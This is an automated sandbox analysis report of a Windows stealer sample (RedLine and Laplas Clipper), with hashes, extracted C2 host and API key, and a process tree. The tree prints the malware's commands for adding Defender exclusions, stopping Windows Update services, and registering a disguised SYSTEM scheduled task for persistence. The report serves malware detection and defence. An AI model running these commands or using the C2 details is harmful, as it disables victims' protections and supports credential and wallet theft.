Analysis
-
max time kernel
97s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
-
submitted
17-07-2023 09:43
General
-
Target
9b06361b484531e8d71b64fbb32534d9.exe
-
Size
2.3MB
-
MD5
9b06361b484531e8d71b64fbb32534d9
-
SHA1
6c47e8bfaf1b82c57c861312f1fe130cc5e21c96
-
SHA256
753fbc1dfa05d6007c5dfa534a7d019cbb24d07224b67ae9d48c9772039c63cd
-
SHA512
dd9ab0d96801bdc8e541c60f0cb23f8c5089f8cefd4fa9041dae5d6d7e393f27ff25cc445117e3804f235fabce0fd2ae80d284463ef2278da5afb6a81f285bbb
-
SSDEEP
49152:SgUFBrKkyuD7ug6e1NsUfgvig28JUU1y4unHZ1IxLRoV:eJK1umgBUU+n28uUMxHXIh6
Malware Config
Extracted
redline
150723_rc_11
rcam15.tuktuk.ug:11290
-
auth_value
0b3645317afbcac212f68853bb45b46d
Extracted
laplas
http://lpls.tuktuk.ug
-
api_key
a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde
Signatures
-
Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 3 IoCs
-
Themida packer 20 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of WriteProcessMemory 34 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\9b06361b484531e8d71b64fbb32534d9.exe"C:\Users\Admin\AppData\Local\Temp\9b06361b484531e8d71b64fbb32534d9.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Octium.exe"C:\Users\Admin\AppData\Local\Temp\Octium.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
C:\Users\Admin\AppData\Local\Temp\TaskMnr.exe"C:\Users\Admin\AppData\Local\Temp\TaskMnr.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12.5MB
MD58dbc96129e97e6f44fe615670544f915
SHA18b93742b542ea62e08ff1e78e9f5cf8d53d4a57a
SHA2560cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683
SHA51263363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a
-
Filesize
12.5MB
MD58dbc96129e97e6f44fe615670544f915
SHA18b93742b542ea62e08ff1e78e9f5cf8d53d4a57a
SHA2560cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683
SHA51263363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
5.1MB
MD52f5fffc7e0e41a5c84b551ce5a423389
SHA1c95e5360ce09ac18d25e89e66c4f51db9cdec43b
SHA256807f54c88592025c02077930259ed3a4c6a3e216a8d53350bbebcb5c597bab2d
SHA5127dba8647e20f929d6debd98f2c6254e5cc54ea3249263df4743d9d6048a5061b9632ca595507e00e7230dd297736b9d5dd2fdfcc4451906793b29edc00f3234a
-
Filesize
5.1MB
MD52f5fffc7e0e41a5c84b551ce5a423389
SHA1c95e5360ce09ac18d25e89e66c4f51db9cdec43b
SHA256807f54c88592025c02077930259ed3a4c6a3e216a8d53350bbebcb5c597bab2d
SHA5127dba8647e20f929d6debd98f2c6254e5cc54ea3249263df4743d9d6048a5061b9632ca595507e00e7230dd297736b9d5dd2fdfcc4451906793b29edc00f3234a
-
Filesize
5.1MB
MD52f5fffc7e0e41a5c84b551ce5a423389
SHA1c95e5360ce09ac18d25e89e66c4f51db9cdec43b
SHA256807f54c88592025c02077930259ed3a4c6a3e216a8d53350bbebcb5c597bab2d
SHA5127dba8647e20f929d6debd98f2c6254e5cc54ea3249263df4743d9d6048a5061b9632ca595507e00e7230dd297736b9d5dd2fdfcc4451906793b29edc00f3234a
-
Filesize
12.5MB
MD58dbc96129e97e6f44fe615670544f915
SHA18b93742b542ea62e08ff1e78e9f5cf8d53d4a57a
SHA2560cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683
SHA51263363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a
-
Filesize
12.5MB
MD58dbc96129e97e6f44fe615670544f915
SHA18b93742b542ea62e08ff1e78e9f5cf8d53d4a57a
SHA2560cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683
SHA51263363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a
-
Filesize
12.5MB
MD58dbc96129e97e6f44fe615670544f915
SHA18b93742b542ea62e08ff1e78e9f5cf8d53d4a57a
SHA2560cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683
SHA51263363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
477.8MB
MD5db65edff06f2512023ffe12e009ff62d
SHA19ec7f31e35f3ad08cebaf9b111fee05b3c0dd626
SHA256a1bf36d3727d053e44b6fd4aa55166942fcb1648d65d7a20df2ab68a4cc8c200
SHA512022beee1e39722aa6149cf6c69f11c8da926691bf57192498783b3062c7f1d7c30c451a08b020ce821917bbeef694ac99f33ed4b48d555e2880b555b49da488c
-
Filesize
495.3MB
MD562b9241fd1ede580ee0b774907fcfb9b
SHA16490eefbac2ad7c273d9402f94b65b8f31d33447
SHA256538b81ac7420a79bf0279dee42be727fc89462da29abbead48eb77cdcafb87aa
SHA512c18a7bc1f7fa3301831dea9f43b374e78d52df355a5ea00aac1996f680045243fa0ad5f7b2f632095c7a54e564caa1bdc625a0544b43b7fc1def4c89bac30682
-
Filesize
72KB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
5.2MB
-
Filesize
1.8MB
-
Filesize
7.7MB
-
Filesize
408KB
-
Filesize
5.6MB
-
Filesize
584KB
-
Filesize
192KB
-
Filesize
472KB
-
Filesize
240KB
-
Filesize
7.7MB
-
Filesize
6.1MB
-
Filesize
1.0MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
960KB
-
Filesize
84KB
-
Filesize
84KB
-
Filesize
84KB
-
Filesize
84KB
-
Filesize
84KB
-
Filesize
84KB
-
Filesize
84KB
-
Filesize
84KB
-
Filesize
960KB
-
Filesize
5.7MB
-
Filesize
84KB
-
Filesize
624KB
-
Filesize
84KB
-
Filesize
5.7MB
-
Filesize
8KB
-
Filesize
84KB
-
Filesize
84KB
-
Filesize
960KB
-
Filesize
84KB
-
Filesize
5.7MB
-
Filesize
960KB
-
Filesize
5.7MB
-
Filesize
960KB
-
Filesize
10.2MB
-
Filesize
2.0MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
2.0MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
2.0MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
2.0MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
2.0MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
2.0MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
2.0MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB